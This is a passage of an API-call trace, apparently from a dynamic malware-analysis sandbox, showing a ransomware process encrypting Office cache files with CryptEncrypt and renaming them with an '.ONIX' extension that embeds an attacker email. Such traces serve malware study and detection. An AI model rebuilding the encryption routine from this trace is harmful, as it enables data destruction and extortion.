lpNumberOfBytesRead=0x367f44c*=0xaec3a, lpOverlapped=0x0) returned 1 [0107.807] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xaec3a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.807] CloseHandle (hObject=0x490) returned 1 [0107.808] GetProcessHeap () returned 0x410000 [0107.808] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0107.808] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0107.810] GetProcessHeap () returned 0x410000 [0107.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0107.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0107.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0107.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473118 | out: hHeap=0x410000) returned 1 [0107.811] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0107.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0107.811] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0107.811] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0107.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0107.811] GetLastError () returned 0x0 [0107.811] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0107.811] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0107.812] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1a41c00, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.812] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.812] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0107.814] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.814] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0107.814] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0107.814] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0107.814] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", dwFileAttributes=0x80) returned 1 [0107.814] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned 78 [0107.814] GetProcessHeap () returned 0x410000 [0107.814] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0107.814] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" [0107.814] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0107.814] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=27532288) returned 1 [0107.815] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1a41c00 [0107.815] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0107.815] GetProcessHeap () returned 0x410000 [0107.815] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0107.815] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0107.815] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0107.816] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0107.817] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0107.818] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a41c00) returned 0x3680020 [0107.819] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1a41c00) returned 0x50d0020 [0107.820] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.820] ReadFile (in: hFile=0x490, lpBuffer=0x3680020, nNumberOfBytesToRead=0x1a41c00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x1a41c00, lpOverlapped=0x0) returned 1 [0109.386] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1a41c00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0109.386] CloseHandle (hObject=0x490) returned 1 [0109.387] GetProcessHeap () returned 0x410000 [0109.387] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0109.387] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0109.390] GetProcessHeap () returned 0x410000 [0109.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0109.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0109.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0109.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0109.390] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPlusrWW.xml", cAlternateFileName="PROPLU~1.XML")) returned 1 [0109.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0109.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0109.390] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0109.390] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0109.390] GetLastError () returned 0x0 [0109.390] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0109.391] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0109.391] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x41d4, nNumberOfBytesToLockHigh=0x0) returned 1 [0109.391] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.391] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0109.394] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.394] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0109.395] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0109.395] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0109.395] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", dwFileAttributes=0x80) returned 1 [0109.395] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned 78 [0109.395] GetProcessHeap () returned 0x410000 [0109.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0109.395] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" [0109.395] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0109.395] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=16852) returned 1 [0109.395] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x41d4 [0109.395] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0109.395] GetProcessHeap () returned 0x410000 [0109.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0109.395] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0109.395] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0109.398] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0109.399] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x41d4) returned 0x4d8b68 [0109.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x41d4) returned 0x4dcd48 [0109.400] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.400] ReadFile (in: hFile=0x490, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x41d4, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x41d4, lpOverlapped=0x0) returned 1 [0109.401] SetFilePointer (in: hFile=0x490, lDistanceToMove=-16852, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.401] WriteFile (in: hFile=0x490, lpBuffer=0x4dcd48*, nNumberOfBytesToWrite=0x41d4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcd48*, lpNumberOfBytesWritten=0x367f44c*=0x41d4, lpOverlapped=0x0) returned 1 [0109.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0109.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4dcd48 | out: hHeap=0x410000) returned 1 [0109.404] UnlockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x41d4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0109.404] CloseHandle (hObject=0x490) returned 1 [0109.405] GetProcessHeap () returned 0x410000 [0109.405] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0109.405] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0109.407] GetProcessHeap () returned 0x410000 [0109.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0109.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0109.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0109.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0109.408] FindNextFileW (in: hFindFile=0x48ec70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x262b2700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x262b2700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x1ffd0c0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xa97cbdb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProPrWW.cab", cAlternateFileName="")) returned 1 [0109.408] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0109.408] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0109.408] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4589f0 [0109.408] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0109.408] GetLastError () returned 0x0 [0109.408] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x490 [0109.409] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0109.409] LockFile (hFile=0x490, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa97cbdb, nNumberOfBytesToLockHigh=0x0) returned 1 [0109.409] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.409] ReadFile (in: hFile=0x490, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0109.415] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.415] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0109.415] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0109.415] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0109.415] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", dwFileAttributes=0x80) returned 1 [0109.415] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 75 [0109.415] GetProcessHeap () returned 0x410000 [0109.415] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0109.415] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" [0109.415] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0109.415] GetFileSizeEx (in: hFile=0x490, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=177720283) returned 1 [0109.415] SetFilePointer (in: hFile=0x490, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xa97cbdb [0109.415] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0109.415] GetProcessHeap () returned 0x410000 [0109.415] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0109.415] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0109.416] WriteFile (in: hFile=0x490, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0109.417] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0109.418] WriteFile (in: hFile=0x490, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x2b30020 [0109.421] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100000) returned 0x3680020 [0109.421] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.422] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.475] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.476] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.477] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.477] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.490] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000 [0109.490] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesWritten=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.498] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.498] WriteFile (in: hFile=0x490, lpBuffer=0x367f448*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x367f448*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0109.498] SetFilePointerEx (in: hFile=0x490, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.498] ReadFile (in: hFile=0x490, lpBuffer=0x2b30020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2b30020*, lpNumberOfBytesRead=0x367f44c*=0x100000, lpOverlapped=0x0) returned 1 [0109.510] SetFilePointer (in: hFile=0x490, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000 [0109.510] WriteFile (in: hFile=0x490, lpBuffer=0x3680020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, 